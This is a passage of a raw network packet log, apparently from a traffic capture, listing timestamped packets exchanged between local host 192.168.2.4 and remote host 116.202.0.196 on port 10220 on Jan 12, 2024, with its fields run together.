                                                                                                                                                                      Jan 12, 2024 06:48:15.836371899 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836379051 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836425066 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836457014 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836508036 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836532116 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836582899 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836595058 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836646080 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836684942 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836714983 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836740017 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836771965 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836834908 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.836859941 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836934090 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.836986065 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837018013 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837071896 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837084055 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837151051 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837177038 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837205887 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837238073 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837317944 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837368011 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837380886 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837420940 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837450027 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837524891 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837577105 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837610006 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837697983 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837733984 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837781906 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837785006 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837842941 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837873936 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837929964 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837965012 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838012934 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838047028 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838098049 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838119984 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838167906 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838201046 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838248968 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838269949 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838320017 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838352919 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838406086 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838479996 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838548899 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838573933 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838607073 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838653088 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838686943 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838749886 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838749886 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838809967 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838814974 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838860989 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838872910 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838906050 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838910103 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838952065 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838958979 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838969946 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.839010000 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.839042902 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.839070082 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025276899 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025279045 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025276899 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025295973 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025311947 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025315046 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025335073 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025340080 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025352955 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025369883 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025381088 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025381088 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025386095 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025402069 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025404930 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025418997 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025429010 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025434971 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025450945 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025450945 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025465965 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025466919 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025485039 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025485992 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025506020 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025510073 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025510073 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025522947 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025528908 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025538921 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025547981 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025556087 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025564909 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025573015 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025589943 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025599003 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025614023 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025615931 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025629044 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025631905 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025650024 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025656939 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025672913 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025679111 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025690079 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025707006 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025717974 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025717974 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025723934 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025742054 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025742054 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025758982 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026001930 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026020050 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026036978 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026050091 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026067019 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026083946 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026165962 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026253939 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026360989 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026377916 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026393890 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026421070 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026452065 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026511908 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026535034 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026551962 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026566029 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026602030 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026602030 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026652098 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026669025 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026691914 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026700020 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026720047 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026747942 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026850939 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026901007 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027091026 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027117014 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027147055 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027175903 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027276039 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027301073 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027317047 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027362108 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027362108 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027410984 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027427912 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027468920 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027468920 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027621031 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027640104 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027673006 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027702093 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027797937 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027816057 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027832031 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027844906 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027873993 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027939081 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027956009 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027973890 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028004885 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028004885 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028254032 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028275013 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028318882 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028347015 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028402090 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028418064 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028458118 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028501987 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028587103 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028615952 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.028649092 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.028667927 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036051035 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036070108 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036087036 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036099911 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036135912 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036135912 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036338091 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036359072 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036375046 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036406040 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036432981 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036475897 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036501884 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036534071 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036561966 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036654949 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036678076 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036703110 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036731958 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036812067 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036834002 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.036879063 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.036988020 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037004948 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037022114 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037046909 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037076950 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037139893 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037187099 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037483931 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037508011 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037538052 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037568092 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037647963 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037672043 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037710905 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037712097 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037801981 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037822962 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.037868023 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037914991 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.037986040 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038009882 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038033009 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038043976 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038069963 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038090944 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038139105 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038285971 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038325071 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038347960 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038371086 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038399935 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038501024 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038518906 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038552046 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038563013 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038572073 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038614035 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038765907 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038786888 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038837910 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038837910 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.038921118 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038947105 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038968086 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.038995028 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039021969 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039246082 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039268970 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039284945 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039315939 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039345026 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039391041 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039443016 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039701939 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039726019 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039764881 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039764881 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039872885 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039896011 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.039932013 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.039975882 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040010929 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040028095 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040070057 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040097952 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040186882 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040213108 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040244102 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040267944 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040448904 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040494919 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040625095 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040653944 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040678024 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040707111 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.040767908 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.040791035 CET1022049751116.202.0.196192.168.2.4
